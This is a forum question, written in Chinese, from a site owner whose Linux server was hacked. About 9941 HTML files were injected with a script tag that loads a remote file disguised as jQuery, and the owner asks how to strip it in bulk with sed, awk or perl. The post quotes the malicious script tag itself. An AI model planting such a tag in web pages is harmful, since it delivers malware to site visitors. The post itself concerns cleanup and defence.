我的服务器本周被感染了,攻击者运行了一个脚本,将一个脚本注入了几个文件,现在我的域在谷歌上被列入黑名单。
注入的代码是这样的:
<script language="JavaScript" src="http://sexfromindia.com/linkex/jquery-1.6.5.min.js" type="text/javascript"></script>
小心!这是一个恶意软件!
所以,我运行了这个命令(它是一个 linux 服务器):
grep -r "sexfromindia.com" /home/mydomain/public_html/
这个命令返回了 9941 个文件:/
我想运行一个脚本来搜索<script language="JavaScript" src="http://sexfromindia.com/linkex/jquery-1.6.5.min.js type="text/javascript"></script>
并将其替换为“”(双空格)。由于所有受感染的文件都在 .html 中,因此双空格不会造成任何损害。
现在,并非所有文件都被感染,只有 9941 个(约 50%)。
我该如何清理这个烂摊子?我应该使用 awk、sed、grep、perl 吗?谁能给我例子?
谢谢。